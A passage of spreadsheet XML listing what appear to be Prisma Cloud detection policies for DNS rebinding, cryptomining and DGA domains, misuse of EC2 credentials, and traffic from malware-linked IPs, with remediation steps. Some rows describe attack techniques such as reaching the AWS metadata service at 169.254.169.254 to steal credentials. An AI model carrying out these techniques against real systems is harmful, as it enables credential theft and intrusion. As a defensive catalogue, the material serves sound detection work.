      <c r="F1477" t="inlineStr"/>
      <c r="G1477" t="b">
        <v>0</v>
      </c>
      <c r="H14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77" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1477" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="K1477" t="inlineStr">
        <is>
          <t>Okta user with effective permissions to create AWS IAM users</t>
        </is>
      </c>
      <c r="L1477" t="inlineStr"/>
      <c r="M1477" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1477" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1477" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1477" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1477" t="inlineStr"/>
      <c r="R1477" t="inlineStr"/>
      <c r="S1477" t="inlineStr"/>
      <c r="T1477" t="b">
        <v>0</v>
      </c>
      <c r="U1477" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1477" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="W1477" t="inlineStr"/>
      <c r="X1477" t="inlineStr"/>
      <c r="Y1477" t="inlineStr"/>
      <c r="Z1477" t="inlineStr">
        <is>
          <t>config from cloud.resource where finding.type = 'Host Vulnerability' AND finding.source = 'Prisma Cloud' AND finding.name = 'CVE-2021-38297'</t>
        </is>
      </c>
      <c r="AA1477" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1477" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1477" t="inlineStr"/>
      <c r="AD1477" t="b">
        <v>0</v>
      </c>
      <c r="AE1477" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1477" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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77" t="inlineStr">
        <is>
          <t>cff65c6e-52af-4f6e-ba0d-722558539199</t>
        </is>
      </c>
      <c r="AI1477" t="inlineStr">
        <is>
          <t>f94e227b-353f-41c2-a12a-37cd206efe89</t>
        </is>
      </c>
      <c r="AJ1477" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1477" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" t="inlineStr"/>
      <c r="B1478" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1478" s="2" t="inlineStr"/>
      <c r="D1478" t="inlineStr"/>
      <c r="E1478" t="inlineStr"/>
      <c r="F1478" t="inlineStr"/>
      <c r="G1478" t="b">
        <v>1</v>
      </c>
      <c r="H14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78" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1478" t="inlineStr">
        <is>
          <t>dns_rebind_anomaly</t>
        </is>
      </c>
      <c r="K1478" t="inlineStr">
        <is>
          <t>DNS Rebinding Activity</t>
        </is>
      </c>
      <c r="L1478" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1478" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1478" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1478" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1478" t="inlineStr">
        <is>
          <t>dns</t>
        </is>
      </c>
      <c r="Q1478" t="inlineStr"/>
      <c r="R1478" t="inlineStr"/>
      <c r="S1478" t="inlineStr">
        <is>
          <t>Attack Path Rule,Discovery,Reconnaissance,Unauthorized Access</t>
        </is>
      </c>
      <c r="T1478" t="b">
        <v>0</v>
      </c>
      <c r="U1478" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1478" t="inlineStr">
        <is>
          <t>anomaly_dns</t>
        </is>
      </c>
      <c r="W1478" t="inlineStr">
        <is>
          <t>Potential DNS rebinding activity. If the Source Host (victim) accesses the compromised Rebinding Web Server (attacker) using the Rebinding Server domain with a web browser (even headless), the attacker could use the victim as a proxy to access unreachable Rebinding Internal resources which are otherwise unreachable from the Internet. For example using this technique an attacker could access the AWS Metadata Service (169.254.169.254), allowing them to steal EC2 temporary AWS credential.</t>
        </is>
      </c>
      <c r="X1478" t="inlineStr">
        <is>
          <t>1. Protect internal services by only allowing HTTPS connections. 
2. Avoid assigning a domain name to the AWS metadata service.</t>
        </is>
      </c>
      <c r="Y1478" t="inlineStr"/>
      <c r="Z1478" t="inlineStr">
        <is>
          <t>dns_rebind_anomaly</t>
        </is>
      </c>
      <c r="AA1478" t="inlineStr">
        <is>
          <t>template@redlock.io</t>
        </is>
      </c>
      <c r="AB1478" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:48</t>
        </is>
      </c>
      <c r="AC1478" t="inlineStr"/>
      <c r="AD1478" t="b">
        <v>1</v>
      </c>
      <c r="AE1478" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1478" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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78" t="inlineStr">
        <is>
          <t>cbe1f974-ed43-4b49-12ac-4b63bd9d6313</t>
        </is>
      </c>
      <c r="AI1478" t="inlineStr">
        <is>
          <t>dns_rebind_anomaly</t>
        </is>
      </c>
      <c r="AJ1478" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1478" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" t="inlineStr"/>
      <c r="B1479" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1479" s="2" t="inlineStr"/>
      <c r="D1479" t="n">
        <v>0</v>
      </c>
      <c r="E1479" t="n">
        <v>1</v>
      </c>
      <c r="F1479" t="n">
        <v>0</v>
      </c>
      <c r="G1479" t="b">
        <v>1</v>
      </c>
      <c r="H14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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1479" t="inlineStr">
        <is>
          <t>dns_crypto_anomaly</t>
        </is>
      </c>
      <c r="K1479" t="inlineStr">
        <is>
          <t>Cryptomining domain request activity</t>
        </is>
      </c>
      <c r="L1479" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M1479" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1479" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1479" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1479" t="inlineStr">
        <is>
          <t>dns</t>
        </is>
      </c>
      <c r="Q1479" t="inlineStr"/>
      <c r="R1479" t="inlineStr"/>
      <c r="S1479" t="inlineStr">
        <is>
          <t>Attack Path Rule,Impact</t>
        </is>
      </c>
      <c r="T1479" t="b">
        <v>0</v>
      </c>
      <c r="U1479" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1479" t="inlineStr">
        <is>
          <t>anomaly_dns</t>
        </is>
      </c>
      <c r="W1479" t="inlineStr">
        <is>
          <t>Identifies client hosts inside your cloud environment initiating suspicious DNS queries to domain names that are associated with known crypto-mining pools.
        Cryptominers are software used to generate new coins in cryptocurrencies such as Bitcoin and Monero. Hackers attempt to compromise cloud environments to execute cryptominers and monetize cloud resources.</t>
        </is>
      </c>
      <c r="X1479" t="inlineStr">
        <is>
          <t>1) Check for miner application processes running on the resource (e.g. xmrig). Consider removing it if evidence of mining activity is found.
        2) Verify your instance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479" t="inlineStr"/>
      <c r="Z1479" t="inlineStr">
        <is>
          <t>dns_crypto_anomaly</t>
        </is>
      </c>
      <c r="AA1479" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1479" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1479" t="inlineStr"/>
      <c r="AD1479" t="b">
        <v>1</v>
      </c>
      <c r="AE1479" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1479" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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79" t="inlineStr">
        <is>
          <t>bbe1f974-ed43-4b49-12ac-4b63bd9d6312</t>
        </is>
      </c>
      <c r="AI1479" t="inlineStr">
        <is>
          <t>dns_crypto_anomaly</t>
        </is>
      </c>
      <c r="AJ1479" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1479" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" t="inlineStr"/>
      <c r="B1480" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1480" s="2" t="inlineStr"/>
      <c r="D1480" t="inlineStr"/>
      <c r="E1480" t="inlineStr"/>
      <c r="F1480" t="inlineStr"/>
      <c r="G1480" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1480" t="inlineStr">
        <is>
          <t>dns_dga_anomaly</t>
        </is>
      </c>
      <c r="K1480" t="inlineStr">
        <is>
          <t>DGA domain request activity</t>
        </is>
      </c>
      <c r="L1480" t="inlineStr">
        <is>
          <t>COMMAND_AND_CONTROL</t>
        </is>
      </c>
      <c r="M1480" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1480" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1480" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1480" t="inlineStr">
        <is>
          <t>dns</t>
        </is>
      </c>
      <c r="Q1480" t="inlineStr"/>
      <c r="R1480" t="inlineStr"/>
      <c r="S1480" t="inlineStr">
        <is>
          <t>Attack Path Rule,Command and Control</t>
        </is>
      </c>
      <c r="T1480" t="b">
        <v>0</v>
      </c>
      <c r="U1480" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1480" t="inlineStr">
        <is>
          <t>anomaly_dns</t>
        </is>
      </c>
      <c r="W1480" t="inlineStr">
        <is>
          <t>Identifies hosts inside your cloud environment initiating suspicious DNS queries to domain names that appear to have been algorithmically generated.
        Domain generation algorithms (DGAs) are used to generate pseudo-random domain names, typically in large numbers within the context of establishing a malicious command-and-control (C2) communications channel.</t>
        </is>
      </c>
      <c r="X1480" t="inlineStr">
        <is>
          <t>1) The cloud instance in the alert is probably infected with malware. Isolate or delete the resource.
        2) Verify your instance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480" t="inlineStr"/>
      <c r="Z1480" t="inlineStr">
        <is>
          <t>dns_dga_anomaly</t>
        </is>
      </c>
      <c r="AA1480" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1480" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1480" t="inlineStr"/>
      <c r="AD1480" t="b">
        <v>1</v>
      </c>
      <c r="AE1480" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1480" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>abe1f974-ed43-4b49-12ac-4b63bd9d6311</t>
        </is>
      </c>
      <c r="AI1480" t="inlineStr">
        <is>
          <t>dns_dga_anomaly</t>
        </is>
      </c>
      <c r="AJ1480" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1480" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" t="inlineStr"/>
      <c r="B1481" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1481" s="2" t="inlineStr"/>
      <c r="D1481" t="inlineStr"/>
      <c r="E1481" t="inlineStr"/>
      <c r="F1481" t="inlineStr"/>
      <c r="G1481" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1481" t="inlineStr">
        <is>
          <t>cred_compromise_activity_anomaly</t>
        </is>
      </c>
      <c r="K1481" t="inlineStr">
        <is>
          <t>Unusual usage of Workload Credentials from inside the Cloud</t>
        </is>
      </c>
      <c r="L1481" t="inlineStr">
        <is>
          <t>LATERAL_MOVEMENT</t>
        </is>
      </c>
      <c r="M1481" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1481" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1481" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1481" t="inlineStr">
        <is>
          <t>identity</t>
        </is>
      </c>
      <c r="Q1481" t="inlineStr"/>
      <c r="R1481" t="inlineStr"/>
      <c r="S1481" t="inlineStr">
        <is>
          <t>Defense Evasion,Initial Access,Lateral Movement</t>
        </is>
      </c>
      <c r="T1481" t="b">
        <v>0</v>
      </c>
      <c r="U1481" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1481" t="inlineStr">
        <is>
          <t>anomaly_identity</t>
        </is>
      </c>
      <c r="W1481" t="inlineStr">
        <is>
          <t>Detects unusual EC2 role credential usage originating from inside the cloud provider's IP address range. This policy uses audit write events.</t>
        </is>
      </c>
      <c r="X1481" t="inlineStr">
        <is>
          <t>1) Review the expected source address and anomalous IP addresses in the alert to determine if the temporary EC2 role credentials were misused. Delete the instance where the credentials were created if you suspect the credentials are compromised.
           2) Examine the configuration of the instance metadata service (IMDS), as instance credentials can be stolen when the IMDSv1 method is allowed. Consider using only IMDSv2 or turning off access to instance metadata. 
           3) Create or update your service control policies (SCPs) or AWS Identity and Access Management (IAM) policies to define permission boundaries with the specific VPC IDs and/or IP addresses where the EC2 credentials can be used.
           4) An alternative to 3) is to specify the credential control properties (aws:Ec2InstanceSourceVpc and aws:Ec2InstanceSourcePrivateIPv4) in the SCP policies, IAM policies or VPC endpoint policies. This can only be enforced on EC2 instances that use a VPC endpoint.
           5) Review your logs to determine all access made with these credentials in the cloud environment and the different resources accessed and activities performed, as this will also help determine the scope of the incident.</t>
        </is>
      </c>
      <c r="Y1481" t="inlineStr"/>
      <c r="Z1481" t="inlineStr">
        <is>
          <t>cred_compromise_activity_anomaly</t>
        </is>
      </c>
      <c r="AA1481" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1481" t="inlineStr">
        <is>
          <t>2023-08-04 05:26:24</t>
        </is>
      </c>
      <c r="AC1481" t="inlineStr"/>
      <c r="AD1481" t="b">
        <v>1</v>
      </c>
      <c r="AE1481" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1481" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>e32a2bff-41ef-4921-ab46-c57a225aa618</t>
        </is>
      </c>
      <c r="AI1481" t="inlineStr">
        <is>
          <t>cred_compromise_activity_anomaly</t>
        </is>
      </c>
      <c r="AJ1481" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1481" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" t="inlineStr"/>
      <c r="B1482" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1482" s="2" t="inlineStr"/>
      <c r="D1482" t="inlineStr"/>
      <c r="E1482" t="inlineStr"/>
      <c r="F1482" t="inlineStr"/>
      <c r="G1482" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1482" t="inlineStr">
        <is>
          <t>cred_compromise_activity_anomaly</t>
        </is>
      </c>
      <c r="K1482" t="inlineStr">
        <is>
          <t>Unusual usage of Workload Credentials from outside the Cloud</t>
        </is>
      </c>
      <c r="L1482" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1482" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1482" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1482" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1482" t="inlineStr">
        <is>
          <t>identity</t>
        </is>
      </c>
      <c r="Q1482" t="inlineStr"/>
      <c r="R1482" t="inlineStr"/>
      <c r="S1482" t="inlineStr">
        <is>
          <t>Attack Path Rule,Defense Evasion,Initial Access</t>
        </is>
      </c>
      <c r="T1482" t="b">
        <v>0</v>
      </c>
      <c r="U1482" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1482" t="inlineStr">
        <is>
          <t>anomaly_identity</t>
        </is>
      </c>
      <c r="W1482" t="inlineStr">
        <is>
          <t>Detects unusual EC2 role credential usage originating from outside of the cloud provider's IP address range. This policy uses audit write events.</t>
        </is>
      </c>
      <c r="X1482" t="inlineStr">
        <is>
          <t>1) Review the expected source address and anomalous IP addresses in the alert to determine if the temporary EC2 role credentials were misused. Delete the instance where the credentials were created if you suspect the credentials are compromised.
           2) Examine the configuration of the instance metadata service (IMDS), as instance credentials can be stolen when the IMDSv1 method is allowed. Consider using only IMDSv2 or turning off access to instance metadata. 
           3) Create or update your service control policies (SCPs) or AWS Identity and Access Management (IAM) policies to define permission boundaries with the specific VPC IDs and/or IP addresses where the EC2 credentials can be used. 
           4) An alternative to 3) is to specify the credential control properties (aws:Ec2InstanceSourceVpc and aws:Ec2InstanceSourcePrivateIPv4) in the SCP policies, IAM policies or VPC endpoint policies. This can only be enforced on EC2 instances that use a VPC endpoint.
           5) Review your logs to determine all access made with these credentials in the cloud environment and the different resources accessed and activities performed, as this will also help determine the scope of the incident.</t>
        </is>
      </c>
      <c r="Y1482" t="inlineStr"/>
      <c r="Z1482" t="inlineStr">
        <is>
          <t>cred_compromise_activity_anomaly</t>
        </is>
      </c>
      <c r="AA1482" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1482" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:34</t>
        </is>
      </c>
      <c r="AC1482" t="inlineStr"/>
      <c r="AD1482" t="b">
        <v>1</v>
      </c>
      <c r="AE1482" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1482" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>e32a2bff-41ef-4921-ab46-c57a225aa619</t>
        </is>
      </c>
      <c r="AI1482" t="inlineStr">
        <is>
          <t>cred_compromise_activity_anomaly</t>
        </is>
      </c>
      <c r="AJ1482" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1482" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1483">
      <c r="A1483"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83" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1483" s="2" t="inlineStr"/>
      <c r="D1483" t="inlineStr"/>
      <c r="E1483" t="inlineStr"/>
      <c r="F1483" t="inlineStr"/>
      <c r="G1483" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1483" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1483" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Cryptominer activity</t>
        </is>
      </c>
      <c r="L1483" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1483" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1483" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1483" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1483" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1483" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1483" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1483" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1483" t="b">
        <v>0</v>
      </c>
      <c r="U1483" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1483" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1483" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (cryptominer), is connecting to one of your cloud hosts.
        Cryptominer hides on computers or mobile devices to surreptitiously use the machine’s resources to mine cryptocurrencies.</t>
        </is>
      </c>
      <c r="X1483"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83" t="inlineStr"/>
      <c r="Z1483" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1483" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1483" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1483" t="inlineStr"/>
      <c r="AD1483" t="b">
        <v>1</v>
      </c>
      <c r="AE1483" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1483" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>c21f09a2-f601-44b1-83b2-7455fdc76323</t>
        </is>
      </c>
      <c r="AI1483" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1483" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1483" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1484">
      <c r="A1484"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84" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1484" s="2" t="inlineStr"/>
      <c r="D1484" t="inlineStr"/>
      <c r="E1484" t="inlineStr"/>
      <c r="F1484" t="inlineStr"/>
      <c r="G1484" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1484" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1484" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Wiper activity</t>
        </is>
      </c>
      <c r="L1484" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1484" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1484" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1484" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1484" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1484" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1484" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1484" t="inlineStr">
        <is>
          <t>Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1484" t="b">
        <v>0</v>
      </c>
      <c r="U1484" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1484" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1484" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (wiper), is connecting to one of your cloud hosts.
        The sole intention of the wiper malware is to destroy data on the target machine. Unlike other attacks like ransomware, which often seeks financial gain, wipers are typically employed to destroy data and cover the attacker’s tracks.</t>
        </is>
      </c>
      <c r="X1484"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84" t="inlineStr"/>
      <c r="Z1484" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1484" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1484" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1484" t="inlineStr"/>
      <c r="AD1484" t="b">
        <v>1</v>
      </c>
      <c r="AE1484" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1484" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>36c248be-bade-4c89-b8c9-ac9e7b353c46</t>
        </is>
      </c>
      <c r="AI1484" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1484" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1484" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1485">
      <c r="A1485"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85" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1485" s="2" t="inlineStr"/>
      <c r="D1485" t="inlineStr"/>
      <c r="E1485" t="inlineStr"/>
      <c r="F1485" t="inlineStr"/>
      <c r="G1485" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1485" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1485" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Downloader activity</t>
        </is>
      </c>
      <c r="L1485" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1485" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1485" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1485" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1485" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1485" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1485" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1485" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1485" t="b">
        <v>0</v>
      </c>
      <c r="U1485" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1485" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1485" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (downloader), is connecting to one of your cloud hosts.
        The downloader is a type of malware that secretly copies malicious files from a remote server, then installs and executes the files.</t>
        </is>
      </c>
      <c r="X1485"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85" t="inlineStr"/>
      <c r="Z1485" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1485" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1485" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1485" t="inlineStr"/>
      <c r="AD1485" t="b">
        <v>1</v>
      </c>
      <c r="AE1485" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1485" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>422f9dcb-38fd-4dc6-b09c-91dcb57a8cee</t>
        </is>
      </c>
      <c r="AI1485" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1485" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1485" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1486">
      <c r="A1486"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86" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1486" s="2" t="inlineStr"/>
      <c r="D1486" t="inlineStr"/>
      <c r="E1486" t="inlineStr"/>
      <c r="F1486" t="inlineStr"/>
      <c r="G1486" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1486" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1486" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Worm activity</t>
        </is>
      </c>
      <c r="L1486" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1486" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1486" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1486" t="inlineStr">
        <is>
          <t>anomaly</t>
